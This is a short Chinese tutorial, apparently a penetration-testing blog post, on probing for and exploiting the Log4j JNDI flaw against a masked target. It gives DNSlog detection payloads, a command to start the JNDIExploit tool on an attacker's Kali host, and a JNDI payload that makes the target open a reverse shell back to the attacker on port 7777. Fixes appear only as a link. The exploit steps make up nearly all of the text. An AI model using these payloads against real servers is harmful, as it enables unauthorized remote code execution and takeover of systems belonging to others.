DNSlog漏洞探测
云端攻击机kali:1x.xxx.xx2.9
目标机:xxx.cn
中转文件:JNDIExploit-1.2-SNAPSHOT.jar
1.1 Payload描述
在log4j漏洞中,常见payload为 ${jndi:ldap://6bbs.dnslog.cn/test}。但由于其中存在//
可能被系统误解为URL链接,故我们可以采用以下新的payload进行测试:${jndi:ldap://${sys:java.version}.335h25.dnslog.cn}。此payload可展示版本信息,若成功显示则证明存在漏洞。
1.2 测试
申请一个域名:gx.dnslog.cn
构造payload:${jndi:ldap://${sys:java.version}.gx.dnslog.cn}
执行后,检查DNSLOG平台是否有数据,若有则证明存在漏洞。
2. log4j RCE
云端攻击机kali:1×3.xxx.xx2.9
目标机:xxx.com
中转文件:JNDIExploit-1.2-SNAPSHOT.jar
2.1 准备工作
在攻击机上运行JNDIExploit-1.2-SNAPSHOT.jar,命令如下:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻击机ip地址
通过漏洞探测得知目标存在log4j漏洞,直接构造exp:${jndi:ldap://攻击机ip:1389/Basic/ReverseShell/攻击机ip/7777},并在攻击机上监听7777端口。
2.2 攻击测试
在输入框中输入构造好的exp,
执行后可获取shell。
通过cat /proc/1/cgroup判断当前为物理机还是Docker。
测试结束,进行报告撰写。
3. 漏洞修复
请参考https://mp.weixin.qq.com/s/O22KoaKFE11dmAR3DVPqB。
暂无评论内容